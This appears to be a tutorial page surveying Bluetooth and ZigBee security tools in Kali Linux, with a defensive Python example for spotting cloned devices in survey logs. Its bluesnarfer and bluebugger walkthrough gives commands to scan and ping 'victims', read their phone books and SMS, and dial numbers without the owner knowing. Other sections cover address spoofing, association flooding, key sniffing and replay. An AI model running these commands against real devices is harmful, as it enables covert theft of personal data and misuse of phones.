- Reading phonebooks
- Writing phonebook entries
- Reading/decoding SMS stored on the device
- Setting call forward
- Initiating phone call
Bluelog is a Linux Bluetooth scanner with optional daemon mode and web front-end, designed for site surveys and traffic monitoring. It’s intended to be run for long periods of time in a static location to determine how many discoverable Bluetooth devices there are in the area.
Use the command below to log details of nearby Bluetooth devices to a file named btdevices.log:
bluelog -i hci0 -o /root/Desktop/btdevices.log -v
Adding -mnc records additional information for each device: manufacturer, broadcast name and device class.
bluelog -i hci0 -mnc -o /root/Desktop/btdevices2.log -v
BlueMaho: Bluetooth Hacker App
BlueMaho is a GUI shell (interface) for a suite of tools for testing the security of Bluetooth devices. It is freeware, open source, written in Python, and uses wxPython. It can be used for testing BT devices for known vulnerabilities and, more importantly, for testing to find unknown ones. It can also produce useful statistics.
BlueMaho is an integrated Bluetooth scanning/hacking tool. Here we will simply use it for scanning. You can start BlueMaho’s elegant GUI by typing:
When you do, it opens a GUI. Here, I have clicked on “get SDP info” and hit the play button to the left. BlueMaho begins scanning for discoverable devices and, like the other tools, it finds two Bluetooth devices.
In the bottom window, BlueMaho displays more info from the scanned devices. I have copied that info and placed it into a text file to make it easier for you to read.
Note that it displays the name of the first device and then describes the device type as “Audio/Video, Headset profile.” It then identifies the second device, and we are told its device type is “Phone, Smart phone.”
Now that we know how to gather information on the Bluetooth devices in our range,
BlueRanger is a simple Bash script which uses Link Quality to locate Bluetooth device radios. It sends l2cap (Bluetooth) pings to create a connection between Bluetooth interfaces, since most devices allow pings without any authentication or authorization. The higher the link quality, the closer the device (in theory).
Use a Bluetooth Class 1 adapter for long-range location detection. Switch to a Class 3 adapter for more precise short-range locating. The precision and accuracy depend on the build quality of the Bluetooth adapter, interference, and the response from the remote device. Fluctuations may occur even when neither device is in motion.
Use the Bluetooth interface (hci1) to scan for the specified remote address (20:C9:D0:43:4B:D8):
blueranger.sh hci1 20:C9:D0:43:4B:D8
Bluesnarfer
Bluesnarfer downloads the phone book of any mobile device vulnerable to Bluesnarfing. If a mobile phone is vulnerable, it is possible to connect to the phone without alerting the owner and gain access to restricted portions of the stored data.
Scan the remote device address (-b 20:C9:D0:43:4B:D8) and get the device info (-i):
bluesnarfer -b 20:C9:D0:43:4B:D8 -i
Hack Mobile Bluetooth Using Bluesnarfer
Check the configuration
Scan for victims:
hcitool scan hci0
Ping the victim device to see if it is awake:
l2ping <victim MAC address>
Browse the victim for RFCOMM channels to connect to:
sdptool browse --tree --l2cap <MAC address>
Then you can use bluesnarfer, for example, to read the victim's phone book, dial a number, read SMS messages or other things:
bluesnarfer -r 1-100 -C 7 -b <MAC address>
To see the available options:
bluebugger -m <victim name> -c 7 -a <MAC address> Dial <number>
Btscanner: Hack Bluetooth In Kali Linux
The Btscanner tool can capture information from a Bluetooth device without pairing. You can download Btscanner using this link. The setup is very small in size (only 1.05 MB) and easy to install. Btscanner searches for devices and shows them on the screen; if you want to see more info, just hit enter and it will show the device's MAC address.
1. Start your Bluetooth service with this command
Syntax: service bluetooth start
2. Now open btscanner with this command
Now you are here
3. Now follow the instructions shown below; in my case, press i and the scan starts
4. Now you see the list of Bluetooth devices
5. Now select one with the arrow keys and press enter to get full info about the Bluetooth device.
RedFang is a small proof-of-concept application to find non-discoverable Bluetooth devices. This is done by brute-forcing the last six (6) bytes of the device's Bluetooth address and doing a read_remote_name().
Scan the given range (-r 00803789EE76-00803789EEff) and discover Bluetooth devices (-s):
fang -r 00803789EE76-00803789EEff -s
Spooftooph is designed to automate spoofing or cloning of Bluetooth device information: the device Name, Class, and Address. Cloning this information effectively allows a Bluetooth device to hide in plain sight. Bluetooth scanning software will only list one of the devices if more than one device in range shares the same device information (specifically the same Address) while the devices are in Discoverable Mode.
Normally most of us never intend to audit the Bluetooth stack in an organization. But this tool can be interesting in an environment where Bluetooth devices have been paired with important hardware.
Use the Bluetooth interface (-i hci1) to spoof itself as the given address (-a 00803789EE76):
spooftooph -i hci1 -a 00803789EE76
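The bluelog section above describes long-running site surveys, and the spooftooph section explains that a cloned address collapses two devices into a single scanner entry. The following added example (not part of bluelog, spooftooph, or this page) shows what a defender can do with the survey log afterwards: count the distinct discoverable devices seen, and flag addresses whose advertised name/class changed between sightings, or one name/class identity advertised from several addresses. The comma-separated log layout `timestamp,address,name,class` and the sample sightings are constructed for this example; bluelog's real on-disk format is not assumed.

```python
"""Survey-log analysis for a Bluetooth site survey.

Added example, not part of bluelog or spooftooph. The log layout
'timestamp,address,name,class' is an assumption made for this example.
"""
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class Sighting:
    timestamp: str
    address: str
    name: str
    dev_class: str


# Constructed sample survey log; addresses, names and classes are made up.
SAMPLE_LOG = """\
2024-01-05 09:00:01,AA:BB:CC:11:22:33,Headset-1,0x240404
2024-01-05 09:00:07,AA:BB:CC:44:55:66,Phone-A,0x5a020c
2024-01-05 09:05:12,AA:BB:CC:11:22:33,Headset-1,0x240404
2024-01-05 09:10:30,AA:BB:CC:44:55:66,Printer,0x080680
2024-01-05 09:12:02,AA:BB:CC:77:88:99,Phone-A,0x5a020c
"""


def parse_log(text):
    """Parse the assumed 4-field CSV layout into Sighting records."""
    sightings = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = [p.strip() for p in line.split(",")]
        if len(parts) != 4:
            raise ValueError(f"line {lineno}: expected 4 fields, got {len(parts)}")
        ts, addr, name, cls = parts
        # Normalise case so the same device is not counted twice.
        sightings.append(Sighting(ts, addr.upper(), name, cls.lower()))
    return sightings


def distinct_devices(sightings):
    """Number of distinct addresses seen during the survey window."""
    return len({s.address for s in sightings})


def identity_conflicts(sightings):
    """Addresses that advertised more than one (name, class) identity.

    A scanner shows one entry per address, so an address whose advertised
    name or class changes between sightings deserves a closer look.
    """
    seen = defaultdict(set)
    for s in sightings:
        seen[s.address].add((s.name, s.dev_class))
    return {addr: sorted(ids) for addr, ids in seen.items() if len(ids) > 1}


def duplicated_identities(sightings):
    """(name, class) identities advertised by more than one address."""
    seen = defaultdict(set)
    for s in sightings:
        seen[(s.name, s.dev_class)].add(s.address)
    return {ident: sorted(addrs) for ident, addrs in seen.items() if len(addrs) > 1}


if __name__ == "__main__":
    records = parse_log(SAMPLE_LOG)
    print("distinct devices:", distinct_devices(records))
    for addr, ids in identity_conflicts(records).items():
        print(f"{addr} advertised {len(ids)} identities: {ids}")
    for ident, addrs in duplicated_identities(records).items():
        print(f"identity {ident} advertised by {addrs}")
```

Both checks are heuristics: a device can legitimately be renamed, and two units of the same model may share a name and class. What the report gives a site surveyor is a short list of addresses to inspect by hand rather than a verdict.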
Other Wireless Tools
zbassocflood: Transmit a flood of associate requests to a target network.
zbassocflood [-pcDis] [-i devnumstring] [-p PAN ID] [-c channel] [-s per-packet delay/float]
zbassocflood -p 0xBAAD -c 11 -s 0.1
zbdsniff: Decode plaintext ZigBee key delivery from a capture file. Will process libpcap or Daintree SNA capture files.
zbdsniff [capturefiles …]
zbdump: A tcpdump-like tool for ZigBee/IEEE 802.15.4 networks. Compatible with Wireshark 1.1.2 and later.
zbdump [-fiwDch] [-f channel] [-w pcapfile] [-W daintreefile] [-i devnumstring]
zbfind: Provides a GTK-based GUI which displays the results of zbstumbler-like functionality. zbfind sends beacon requests as it cycles through channels and listens for responses, adding each response to a table and displaying its signal strength on a gauge widget.
zbgoodfind: Search a binary file to identify the encryption key for a given SNA or libpcap IEEE 802.15.4 encrypted packet.
zbgoodfind [-frRFd] [-f binary file] [-r pcapfile] [-R daintreefile] [-F Don't skip 2-byte FCS at end of each frame] [-d generate binary file (test mode)]
zbreplay: Replay ZigBee/802.15.4 network traffic from libpcap or Daintree files.
zbreplay [-rRfiDch] [-f channel] [-r pcapfile] [-R daintreefile] [-i devnumstring] [-s delay/float] [-c countpackets]
Transmit beacon request frames to the broadcast address while channel hopping to identify ZC/ZR devices.